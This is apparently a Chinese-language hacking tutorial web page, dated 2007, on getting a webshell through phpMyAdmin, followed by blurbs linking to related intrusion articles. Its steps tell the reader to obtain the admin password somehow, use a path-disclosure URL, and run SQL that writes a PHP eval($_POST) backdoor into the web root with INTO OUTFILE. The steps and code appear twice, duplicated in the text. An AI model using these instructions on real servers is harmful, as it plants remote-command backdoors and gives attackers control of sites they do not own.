phpMyAdmin 后臺(tái)拿webshell
更新時(shí)間:2007年03月08日 00:00:00 作者:
1.如何拿到登陸密碼. 自己想辦法
2.訪問(wèn) : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個(gè)Database.運(yùn)行以下語(yǔ)句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒(méi)什么意外.對(duì)應(yīng)網(wǎng)站得到webshell
2.訪問(wèn) : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個(gè)Database.運(yùn)行以下語(yǔ)句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒(méi)什么意外.對(duì)應(yīng)網(wǎng)站得到webshell
相關(guān)文章
非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)
簡(jiǎn)單的說(shuō)來(lái),webshell就是一個(gè)asp或php木馬后門(mén),黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門(mén)文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。2008-06-06
入侵過(guò)程中用過(guò)的三大門(mén)派的幾個(gè)小工具[推薦]
vbs在入侵中的作用、我在入侵中的注意的細(xì)節(jié)、跨站、入侵中的批處理、入侵過(guò)程中用的小工具共有這五個(gè),當(dāng)然隨著期數(shù)的變化,出的題目也會(huì)增加,現(xiàn)在大家針對(duì)這些題目歡迎來(lái)稿呀,不要被高手這兩個(gè)字嚇住了。2008-10-10
一些通用跳轉(zhuǎn)地址,XXOXX的時(shí)候有點(diǎn)用
近日在寫(xiě)exploit的時(shí)候需要用到一些其他語(yǔ)言的call ebx的跳轉(zhuǎn)地址,但是metasploit的opcode DB沒(méi)有包括繁體中文、日文、韓文機(jī)器的跳轉(zhuǎn)地址,所以費(fèi)了點(diǎn)時(shí)間收集了下,在這里要感謝傲少提供的機(jī)器給我去找地址?,F(xiàn)在貼到這里,方便大家。2008-09-09
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
在國(guó)外對(duì)ORACLE的攻擊一直很收關(guān)注,只是國(guó)內(nèi)研究的人不太多,或者技術(shù)不夠~這里我就打響第一炮吧2007-10-10

